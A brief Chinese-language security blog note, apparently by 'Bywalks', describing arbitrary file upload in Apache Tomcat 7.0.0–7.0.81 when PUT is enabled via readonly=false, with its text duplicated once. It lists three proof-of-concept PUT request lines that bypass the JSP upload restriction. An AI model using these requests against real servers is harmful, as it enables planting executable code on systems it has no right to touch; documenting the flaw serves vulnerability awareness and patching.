前言
记Tomcat开启PUT后的任意文件上传
影响版本
7.0.0 - 7.0.81
需要因素
conf/web.xml文件添加readonly参数,属性值为false
POC:
1 | PUT /test.jsp::$DATA HTTP/1.1 |
1 | PUT /test.jsp/ HTTP/1.1 |
1 | PUT /test.jsp/. HTTP/1.1 |
记Tomcat开启PUT后的任意文件上传
7.0.0 - 7.0.81
conf/web.xml文件添加readonly参数,属性值为false
POC:
1 | PUT /test.jsp::$DATA HTTP/1.1 |
1 | PUT /test.jsp/ HTTP/1.1 |
1 | PUT /test.jsp/. HTTP/1.1 |
Author: Bywalks
License: Copyright (c) 2022 CC-BY-NC-4.0 LICENSE
Slogan: Do you believe in DESTINY?